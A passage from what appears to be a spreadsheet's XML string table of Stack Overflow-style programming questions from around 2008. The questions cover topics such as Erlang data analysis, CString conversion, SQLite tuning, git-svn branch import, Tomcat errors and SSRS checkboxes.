    <t xml:space="preserve">&lt;p&gt;I want to  answer questions about data in Erlang: count things, correlate messages, provide arbitrary statistics.  I had thought about resorting to Hadoop for this but is it possible to build a solution in raw Erlang to do rather arbitrary data analysis not necessarily via map/reduce but somehow?  I have seen some hints of people doing this but no explicit blog posts or examples of this being done.  I know that Powerset's natural language capabilities are written in Erlang. I also know about CouchDB but was looking for some other solutions.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>.NET training suggestion for an average developer</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Some devs in our office need training.  They're working on .NET projects and just aren't picking it up very well.  (Their backgrounds are in VB6.  Yes.  In 2008.  Go figure.)    I've been to a couple training courses in the past, and they've fortunately been very good.  It seems like if you have a good instructor (early DevelopMentor .NET course and Ted Pattison's SharePoint course were great) and you're actively enthusiastic about the subject matter, you can get a LOT out of a good week-long course.  My question is whether it's worthwhile for someone who simply might not really care all that much -- an "average" dev.  Are they likely to learn enough (or even to magically become inspired) to make the investment worth it for the company?&lt;/p&gt;
&lt;p&gt;If so, which general .NET courses with a C# focus would you recommend?  I always wanted to try JP Boodhoo's course for no other reason than that he is so darn efficient in Visual Studio/Resharper... and his TDD approach, of course.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>"Functionoids"?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've read the description of "functionoids" &lt;a href="http://www.parashift.com/c++-faq-lite/pointers-to-members.html#faq-33.10" rel="nofollow"&gt;here&lt;/a&gt;. They look like a poor-man's version of Boost::function and Boost::bind. Am I missing something? Is there a good reason to use them if you're already using Boost?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to convert CString and ::std::string  ::std::wstring to each other?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;&lt;code&gt;CString&lt;/code&gt; is quite handy, while &lt;code&gt;std::string&lt;/code&gt; is more compatible with STL container.
I am using &lt;code&gt;hash_map&lt;/code&gt;. However, &lt;code&gt;hash_map&lt;/code&gt; does not support &lt;code&gt;CString&lt;/code&gt; as key, so I want to convert &lt;code&gt;CString&lt;/code&gt; into &lt;code&gt;std::string&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;Writing a &lt;code&gt;CString&lt;/code&gt; hash function seems to take a lot of time.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;CString -----&amp;gt; std::string
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;How can I do this?&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;std::string -----&amp;gt; CString:
inline CString toCString(std::string const&amp;amp; str)
{
    return CString(str.c_str()); 
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Am I right?&lt;/p&gt;
&lt;hr&gt;
&lt;p&gt;&lt;strong&gt;EDIT:&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Here are more questions:&lt;/p&gt;
&lt;p&gt;How can I convert &lt;code&gt;wstring&lt;/code&gt;, &lt;code&gt;CString&lt;/code&gt; to each other?&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;//wstring -&amp;gt; CString,
std::wstring src;
CString result(src.c_str());
//CString-&amp;gt;wstring. 
CString src;
::std::wstring des(src.GetString());
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Is there &lt;strong&gt;any&lt;/strong&gt; problem?&lt;/p&gt;
&lt;p&gt;How can I convert &lt;code&gt;std::wstring&lt;/code&gt;, &lt;code&gt;std::string&lt;/code&gt; to each other?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What is the memory consumption of an object in Java?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is the memory space consumed by one object with 100 attributes the same as that of 100 objects, with one attribute each?&lt;/p&gt;
&lt;p&gt;How much memory is allocated for an object?&lt;br /&gt;
How much additional space is used when adding an attribute?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Sqlite Optimization: Read only scenario</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I use SQLite for a number of application on the desktop and PDA. Most operations are readonly, as SQLite functions as a data store for reference material in my applications.&lt;/p&gt;
&lt;p&gt;Basically, I am looking for suggestions on improving performance in a scenario where you know the access to the data is only read-only.&lt;/p&gt;
&lt;p&gt;Maybe via various pragma settings? etc...&lt;/p&gt;
&lt;p&gt;SQLite performance is excellent, however on the PDA when you have multiple databases I can see a small performance hit. I dont think this is a problem with SQLite, just the reality of the speed of a PDA. However, having said that, maybe there are ways to improve it.&lt;/p&gt;
&lt;hr&gt;
&lt;p&gt;Good advice and well put. I am hoping for something more specific in telling the engine about what I am doing. For example, telling the engine there will be no multiple writes to the DB, or modifying the cache handling in some way.&lt;/p&gt;
&lt;p&gt;However, I am glad you called attention to the "design" aspect of the database as a leading issue.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Ribbon UI for Visual Studio 2010 or beyond?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;One of the PDC2008 presentations showed off the new VS2010 UI (not the same as the current beta) that was built with WPF.  Some of the new code effects looked fairly nice (comment xml parsed and styled within the code editor).&lt;/p&gt;
&lt;p&gt;It got me wondering if Microsoft would ever change the VS UI to the Ribbon; like Office, the change could possibly be forced with no 'classic' mode.&lt;/p&gt;
&lt;p&gt;Would you embrace such a change?&lt;/p&gt;
&lt;p&gt;From what I gather&lt;/p&gt;
&lt;p&gt;Advanced programmers: minor change, hot keys are the same.&lt;/p&gt;
&lt;p&gt;Intermediate/Beginner programmers: considerable change, every button has moved!&lt;/p&gt;
&lt;p&gt;New programmers:  Context sensitive ribbons help emphasize what they may do and where.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Better way to implement an Html Helper method?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I created an html helper &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Html.BreadCrumb(IDictionary&amp;lt;string, string&amp;gt; crumbs)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Where the first string is the label and the second string is the URL.
The helper creates the html required (an unordered list, some classes for first element, current element, last element, dead element and separators etc)
All working nice, but I do this by creating a stringbuilder, pumping all the html in it and returning the stringbuilder's content as a string.&lt;/p&gt;
&lt;p&gt;I figure in this example it doesn't matter all that much, but what if an Html helper is churning out a big load of html? Isn't there a way to push it to Response.Write instead of a stringbuilder?&lt;/p&gt;
&lt;p&gt;Or any other issues/improvements you have?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to get On Focus CWindow handle?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is there any way to get the handle to the control that has focus?
I am looking for a way to get the ID of control on focus in my app. &lt;/p&gt;
&lt;p&gt;After that it would be easy to get the id with GetDlgCtrlID.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;CWnd *pwnd = GetWindowOnFocus(); 
int wID = pwnd-&amp;gt;GetDlgCtrlID();
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;It's the GetWindowOnFocus part that I am missing!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Python filter/remove URLs from a list</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a text file of URLs, about 14000.  Below is a couple of examples:&lt;/p&gt;
&lt;p&gt;&lt;a href="http://www.domainname.com/pagename?CONTENT_ITEM_ID=100&amp;amp;param2=123" rel="nofollow"&gt;http://www.domainname.com/pagename?CONTENT_ITEM_ID=100&amp;amp;param2=123&lt;/a&gt;&lt;br /&gt;
&lt;a href="http://www.domainname.com/images?IMAGE_ID=10" rel="nofollow"&gt;http://www.domainname.com/images?IMAGE_ID=10&lt;/a&gt;&lt;br /&gt;
&lt;a href="http://www.domainname.com/pagename?CONTENT_ITEM_ID=101&amp;amp;param2=123" rel="nofollow"&gt;http://www.domainname.com/pagename?CONTENT_ITEM_ID=101&amp;amp;param2=123&lt;/a&gt;&lt;br /&gt;
&lt;a href="http://www.domainname.com/images?IMAGE_ID=11" rel="nofollow"&gt;http://www.domainname.com/images?IMAGE_ID=11&lt;/a&gt;&lt;br /&gt;
&lt;a href="http://www.domainname.com/pagename?CONTENT_ITEM_ID=102&amp;amp;param2=123" rel="nofollow"&gt;http://www.domainname.com/pagename?CONTENT_ITEM_ID=102&amp;amp;param2=123&lt;/a&gt;&lt;br /&gt;&lt;/p&gt;
&lt;p&gt;I have loaded the text file into a Python list and I am trying to get all the URLs with CONTENT_ITEM_ID separated off into a list of their own.  What would be the best way to do this in Python?&lt;/p&gt;
&lt;p&gt;Cheers&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Browser back button - does it delete session data?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Does hitting the back button in a web browser cause the session data set in the preceding call to be deleted?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Can you get SkinID Autocompletion in ASCX Controls</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Working in VS 2008&lt;/p&gt;
&lt;p&gt;When working on on ASPX file in &lt;code&gt;Source&lt;/code&gt; mode, if i've specified a StyleSheetTheme in the page directive of the file, then Visual Studio will provide me with AutoCompletion lists of the possible skinID values for a control &lt;/p&gt;
&lt;p&gt;e.g.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;asp:Button ID="myButton" runat="server" SkinID="
//Having typed this much, I'll get an intellisense with the possible skinid values for this button
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I'm just wondering is it possible to get the same functionality in an ASCX.
Because theres no stylesheettheme specified for the control, VS doesn't know what the possible values are... &lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Can you specify a default stylesheet theme that Visual Studio can use for Web User Controls.&lt;/strong&gt;&lt;/p&gt;
</t>
  </si>
  <si>
    <t>ASP.NET Web site/service hosting</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Are there other possibilities besides IIS for hosting web sites and web services based on ASP.NET, which are recommended by Microsoft for small-scale environments?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I import svn branches rooted in different directories into git using git-svn?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have an SVN repository structure like below. We are using multiple levels under branches for various release maintenance branches, plus a directory for feature branches.&lt;/p&gt;
&lt;p&gt;git-svn init seems to work with a single --branches argument, i.e. it seems to expect all of the branches to be in a single location.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;trunk
branches
  1.1
    1.2.1
    1.2.2
  1.2
    1.2.1
    1.2.2
    1.2.3
  features
    feature1
    feature2
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Any ideas on how to handle this?&lt;/p&gt;
&lt;p&gt;Thanks&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I integrate Filenet and Outlook?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;How do I integrate Filenet and Outlook?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>htaccess request forwarding if internal ip</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is there a possible htaccess directive that can transparently forward request from index.php to index_internal.php if the request is coming from an internal ip range?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What tools are built using themselves?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am curious about what tools are used to build the next version of themselves.&lt;/p&gt;
&lt;p&gt;For example, Delphi has long claimed that "&lt;a href="http://en.wikipedia.org/wiki/Borland_Delphi#Products_developed_with_Delphi" rel="nofollow"&gt;Delphi is written in Delphi&lt;/a&gt;".&lt;/p&gt;
&lt;p&gt;I assume Visual Studio is written using Visual Studio.&lt;/p&gt;
&lt;p&gt;What are some other examples of tools that written in themselves?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How should I get started learning about ADO.NET Entity Framework?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;So here I am just about to start a big project using LINQ to SQL and then I read this:&lt;/p&gt;
&lt;p&gt;&lt;a href="http://www.infoq.com/news/2008/11/DLINQ-Future" rel="nofollow"&gt;Is LINQ to SQL Truly Dead?&lt;/a&gt; by Jonathan Allen for InfoQ.com&lt;/p&gt;
&lt;p&gt;Well, I don't want to be supporting LINQ to SQL indefinitely if it's a dead end.  So, how should I get started learning about ADO.NET Entity Framework?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to serialize an object to XML without getting xmlns="..."?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is there a way for me to serialize an object in .NET without the XML Namespaces automatically serializing also?  It seems that by default .NET believes the XSI and XSD namespaces should be included, but I don't want them there.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Phone number normalization: Any pre-existing libraries?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a system which is using phone numbers as unique identifiers. For this reason, I want to format all phone numbers as they come in using a normalized format. Because I have no control over my source data, I need to parse out these numbers myself and format them before adding them to my DB.&lt;/p&gt;
&lt;p&gt;I'm about to write a parser that can read phone numbers in and output a normalized phone format, but before I do I was wondering if anyone knew of any pre-existing libraries I could use to format phone numbers.&lt;/p&gt;
&lt;p&gt;If there are no pre-existing libraries out there, what things should I be keeping in mind when creating this feature that may not be obvious?&lt;/p&gt;
&lt;p&gt;Although my system is only dealing with US numbers right now, I plan to try to include support for international numbers just in case since there is a chance it will be needed.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Edit&lt;/strong&gt; I forgot to mention I'm using C#.NET 2.0.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Why would I choose Powershell over WMI to develop management interfaces?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;We are discussing development of an improved management infrastructure for our distributed system.
We use COM, web services and .NET components. Since we're based on Microsoft Windows Server XP/2003, I guess, we basically have two options:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;Powershell cmdlets
&lt;li&gt;WMI classes using System.Management and WMI providers for native code (class, instance, method, event)
&lt;/ol&gt;
&lt;p&gt;Why would we choose Powershell over WMI?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Scanning Java annotations at runtime</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;What is the best way of searching the whole classpath for an annotated class?&lt;/p&gt;
&lt;p&gt;I'm doing a library and I want to allow the users to annotate their classes, so when the Web application starts I need to scan the whole classpath for certain annotation.&lt;/p&gt;
&lt;p&gt;Do you know a library or a Java facility to do this?&lt;/p&gt;
&lt;p&gt;Edit: I'm thinking about something like the new functionality for Java EE 5 Web Services or EJB's. You annotate your class with &lt;code&gt;@WebService&lt;/code&gt; or &lt;code&gt;@EJB&lt;/code&gt; and the system finds these classes while loading so they are accessible remotely.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to cut out a part from a stream in Delphi7</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have an incoming soap message wich form is TStream (Delphi7), server that send this soap is in development mode and adds a html header to the message for debugging purposes. Now i need to cut out the html header part from it before i can pass it to soap converter. It starts from the beginning with 'pre' tag and ends with '/pre' tag. Im thinking it should be fairly easy to but i havent done it before in Delphi7, so can someone help me?  &lt;/p&gt;
</t>
  </si>
  <si>
    <t>Why is tomcat looking for JSF classes?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am trying to get my development environment up and running, and I am having trouble with Tomcat trying to load JSF classes for some reason.  My application does not use JSF; in fact, I haven't even deployed my application to tomcat yet.  I am getting a number of stack traces in the startup logs and I cannot load the default tomcat homepage when I try to open &lt;a href="http://localhost:8080" rel="nofollow"&gt;http://localhost:8080&lt;/a&gt; (I just get the tomcat 404 page).&lt;/p&gt;
&lt;p&gt;Here is what the first stack trace is:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;SEVERE: Error configuring application listener of class com.sun.faces.util.ReflectionUtils$ReflectionUtilsListener
java.lang.ClassNotFoundException: com.sun.faces.util.ReflectionUtils$ReflectionUtilsListener
    at org.apache.catalina.loader.WebappClassLoader.loadClass(WebappClassLoader.java:1386)
    at org.apache.catalina.loader.WebappClassLoader.loadClass(WebappClassLoader.java:1232)
    at org.apache.catalina.core.StandardContext.listenerStart(StandardContext.java:3712)
    at org.apache.catalina.core.StandardContext.start(StandardContext.java:4216)
    at org.apache.catalina.core.ContainerBase.addChildInternal(ContainerBase.java:760)
    at org.apache.catalina.core.ContainerBase.addChild(ContainerBase.java:740)
    at org.apache.catalina.core.StandardHost.addChild(StandardHost.java:544)
    at org.apache.catalina.startup.HostConfig.deployDescriptor(HostConfig.java:626)
    at org.apache.catalina.startup.HostConfig.deployDescriptors(HostConfig.java:553)
    at org.apache.catalina.startup.HostConfig.deployApps(HostConfig.java:488)
    at org.apache.catalina.startup.HostConfig.start(HostConfig.java:1150)
    at org.apache.catalina.startup.HostConfig.lifecycleEvent(HostConfig.java:311)
    at org.apache.catalina.util.LifecycleSupport.fireLifecycleEvent(LifecycleSupport.java:120)
    at org.apache.catalina.core.ContainerBase.start(ContainerBase.java:1022)
    at org.apache.catalina.core.StandardHost.start(StandardHost.java:736)
    at org.apache.catalina.core.ContainerBase.start(ContainerBase.java:1014)
    at org.apache.catalina.core.StandardEngine.start(StandardEngine.java:443)
    at org.apache.catalina.core.StandardService.start(StandardService.java:448)
    at org.apache.catalina.core.StandardServer.start(StandardServer.java:700)
    at org.apache.catalina.startup.Catalina.start(Catalina.java:552)
    at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
    at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:39)
    at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:25)
    at java.lang.reflect.Method.invoke(Method.java:324)
    at org.apache.catalina.startup.Bootstrap.start(Bootstrap.java:295)
    at org.apache.catalina.startup.Bootstrap.main(Bootstrap.java:433)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I also get similar stack traces for the following other classes:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;com.sun.faces.config.ConfigureListener
com.sun.faces.application.WebappLifecycleListener
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I'm not sure if this is relevant, but I am running Tomcat 5.5.27 with the 1.4 compatibility pack installed, with Java 1.4.2, on Mas OS 10.5.&lt;/p&gt;
&lt;p&gt;Thanks for any ideas!&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;EDIT:&lt;/strong&gt; It seems that each of the default applications that come with Tomcat (host-manager, balancer, tomcat-docs, jsp-examples, etc) was relying on these JSF classes.  I removed these default applications, and everything seems to be working.&lt;/p&gt;
&lt;p&gt;So, my question is now:
&lt;strong&gt;Why does tomcat come with applications that don't include their dependencies, and what do I need to do to make those default applicaitons work?&lt;/strong&gt;&lt;/p&gt;
</t>
  </si>
  <si>
    <t>iterator adapter to iterate just the values in a map?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm just getting back into C++ after a couple of years of doing a lot of C#, and recently Objective C.&lt;/p&gt;
&lt;p&gt;One thing I've done before is to roll my own iterator adapter for std::map that will deref to just the value part, rather than the key-value pair. This is quite a common and natural thing to do. C# provides this facility with its Keys and Values properties of its Dictionary class. Objective-C's NSDictionary, similarly, has allKeys and allValues.&lt;/p&gt;
&lt;p&gt;Since I've been "away", Boost has acquired the Range and ForEach libraries, which I am now using extensively. I wondered if between the two there was some facility to do the same, but I haven't been able to find anything.&lt;/p&gt;
&lt;p&gt;I'm thinking of knocking something up using Boost's iterator adapters, but before I go down that route I thought I'd ask here if anyone knows of such a facility in Boost, or somewhere else ready made?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Disappearing bullet points</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;&lt;a href="http://biochrom.fivesite.co.uk/catalogue4.asp" rel="nofollow"&gt;http://biochrom.fivesite.co.uk/catalogue4.asp&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;On the page above there is an image floated to the left. To the right of it is a list, titled "features". The list items have a background image, however, it isn't appearing. List 2 shows how the background image looks.&lt;/p&gt;
&lt;p&gt;Does anyone know how I can make the bullets visible?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to display image in grails GSP?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm still learning Grails and seem to have hit a stumbling block.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Here are the 2 domain classes:&lt;/strong&gt;&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;class Photo {
    byte[] file 
    static belongsTo = Profile
}
class Profile {
    String fullName
    Set photos
    static hasMany = [photos:Photo]     
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;strong&gt;The relevant controller snippet:&lt;/strong&gt;   &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;class PhotoController {
.....
    def viewImage = {
      def photo = Photo.get( params.id )
      byte[] image = photo.file 
      response.outputStream &amp;lt;&amp;lt; image
    } 
 ......
} 
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;strong&gt;Finally the GSP snippet:&lt;/strong&gt;&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;img class="Photo" src="${createLink(controller:'photo', action:'viewImage', id:'profileInstance.photos.get(1).id')}" /&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Now how do I access the photo so that it will be shown on the GSP? I'm pretty sure that 
&lt;strong&gt;profileInstance.photos.get(1).id&lt;/strong&gt;  is not correct. Thanks!!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What do you use to test the handheld css on your website?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've been adding css support for &lt;strong&gt;handheld&lt;/strong&gt; to my website but haven't been able to find a good tool for testing. &lt;/p&gt;
&lt;p&gt;I tried using the webdeveloper plugin for Firefox but it doesn't work for me. Maybe that is because all my css is in the html and not a seperate css file.&lt;/p&gt;
&lt;p&gt;Are there any other testing tools available aside from going out and buying a handheld device?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Calling internal methods in Medium Trust</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have the requirement to call an internal method of a 3rd party object (I cannot make it public for example). I can do that via reflection. Unfortunately this does not work in ASP.NET Medium trust due to insufficient rights:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;IPermission class="ReflectionPermission" version="1" Flags="RestrictedMemberAccess"/&amp;gt;&amp;lt;/PermissionSet&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Is there any way I can internal methods in this case? I've heard that LINQ expressions can be used to call private/internal methods. Would expression methods somehow override the ReflectionPermission? &lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I best display CheckBoxes in SQL Server Reporting Services?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;One of the many quirks of Reporting Services we've run across is the complete and utter lack of a CheckBox control or even something remotely similar.&lt;/p&gt;
&lt;p&gt;We have a form that should appear automatically filled out based on information pulled from a database.  We have several bit datatype fields.  Printing out "True" or "False" just looks silly, as this is supposed to look like a form that has been auto-filled out, so we want to have a series of checkboxes and labels that are either checked or unchecked.&lt;/p&gt;
&lt;p&gt;We are running SSRS 2005 but I'm not aware of SSRS 2008 having added a CheckBox control.  Even if it did, we'd need to have an alternative for the time being.  The best we've found so far is:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;use Wingdings&lt;/li&gt;
&lt;li&gt;use images&lt;/li&gt;
&lt;li&gt;use text boxes with borders and print a blank/space or a capital X&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;All three approaches require &lt;code&gt;IIF&lt;/code&gt; expression shenanigans.&lt;/p&gt;
&lt;p&gt;The Wingdings approach seemed to work acceptably, and was the most aesthetically pleasing except that for whatever reason it didn't always print correctly.  More importantly, PDF exports, also for whatever reason, converted all fonts (generally) to Arial and so we got funky letters instead of the Windings dingbats.&lt;/p&gt;
&lt;p&gt;Images, being a pixel-based raster, don't do so well when printed along side vector stuff like text.  Unless handled carefully, they tend to stretch, pixelate, and do other unprofessional looking things.&lt;/p&gt;
&lt;p&gt;While these methods do work (some with limitations as mentioned above) none of them are particularly elegant.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Are we missing something obvious?&lt;/strong&gt;  Not so obvious?  Does someone at Microsoft have a good reason why such a control was not provided in SSRS 2000, let alone 2 versions and 8 years later?  This can't be the first time this issue has come up...&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Using nullable types in C#</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm just interested in people's opinions. When using nullable types in C# what is the best practice way to test for null:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;bool isNull = (i == null);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;or&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;bool isNull = !i.HasValue;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Also when assigning to a non-null type is this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;long? i = 1;
long j = (long)i;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;better than:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;long? i = 1;
long j = i.Value;
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>&lt;base target="FrameName"&gt; doesn't work on IE7</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;It seems that the following piece of HTML is ignored in IE7 but works ok in IE6/FF. It supposes to override all the html links to be opened in the desired frame&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;HEAD&amp;gt;   
 &amp;lt;title&amp;gt;LeftPane&amp;lt;/title&amp;gt;   
 &amp;lt;base target="rightFrame"&amp;gt;  
&amp;lt;/HEAD&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The above code is the header of a left frame that holds an Infragistics UltraWebTree (tree menu) which doesn't support the TargetFrame property.&lt;/p&gt;
&lt;p&gt;Is there another way to add the target attribute to all the links elements on the desired page. &lt;/p&gt;
&lt;p&gt;Any server or client-side code workarounds?&lt;/p&gt;
&lt;p&gt;The site is built on ASP.Net 1.1 and Infragistics V 2.0&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Update&lt;/strong&gt; 
the web page is aspx an the doctype is &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" &amp;gt;
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>Is this the correct step-by-step and organization for creating an SVN repo with multiple projects and vendors?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've read quite a bit of the Red Bean Software SVN Book, and some of the questions here on SO, but I want to make sure I'm going about this in the right way the first time around step-by-step before I begin using it. Is this correct?&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;Install SVN.&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Create SVN repository at /usr/local/svn. Directory structure looks like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;-- conf
-- db
-- format
-- hooks
-- locks
-- README.txt
&lt;/code&gt;&lt;/pre&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Create folders through command line for repository organization (including projects and vendors).&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;-- conf
-- db
-- format
-- hooks
-- locks
-- projects
   -- project_name
      -- vendor
      -- trunk
      -- branches
      -- tags
   -- project_name
      -- vendor
      -- trunk
      -- branches
      -- tags
-- README.txt
&lt;/code&gt;&lt;/pre&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Checkout vendor code into vendor folder under the correct project name.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;Export vendor code into trunk under the correct project name (no merge necessary, as I have no project trunk files yet).&lt;/li&gt;
&lt;li&gt;Create users/permissions in /svnroot/conf/passwd and /svnroot/conf/svnserve.conf.&lt;/li&gt;
&lt;li&gt;Make sure that svnserve is running, and on my local SVN client (TortoiseSVN), checkout the trunk for the project that I need.&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;I don't need to serve this up by public URL, so I'm not configuring for Apache. The server is not in our network, but is a dedicated CentOS box we rent. Thanks for any thoughts and advice.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;EDIT:&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;I guess I'm confused because I don't have code or a project to begin with, so I am starting fresh from the vendor's code. Do I need to create a directory structure somewhere  on the server that includes my project_name w/ vendor, trunk, branches and tags subfolders, import that into my repo, and then import the code from the vendor into the vendor folder? The idea is that I can get updates from the vendor, and then merge those updates with any changes I made to my trunk.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is there danger of corruption in SQL Server 2000 databases when using SQL Server 2005 Management Studio?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;In an interview for a SQL DBA position a while back, I mentioned I prefer the SQL 2005 Management Studio app vs. the old 2000 versions of Enterprise Manager / Query Analyzer. The DBA who was interviewing me said that they had experienced some sort of database corruption in their 2000 databases when making changes from the 2005 MS, so they always use Enterprise Manager now. &lt;/p&gt;
&lt;p&gt;He was a bit vague, but I got the impression he was talking about some sort of corruption experienced when making server-wide or database-level setting changes, and not just routine SQL updates or something.&lt;/p&gt;
&lt;p&gt;Anyone heard of anything like this? I didn't end up taking that position, so I can't follow up to get more info.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Painless 'Analysis of Algorithms' Training?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I had a painful experience with the "Analysis of Algorithms" classes back in college but have recently found a need for it in the &lt;em&gt;real world&lt;/em&gt;.  -- Anyway, I'm looking for a simple-yet-effective crash course.  Any ideas?&lt;/p&gt;
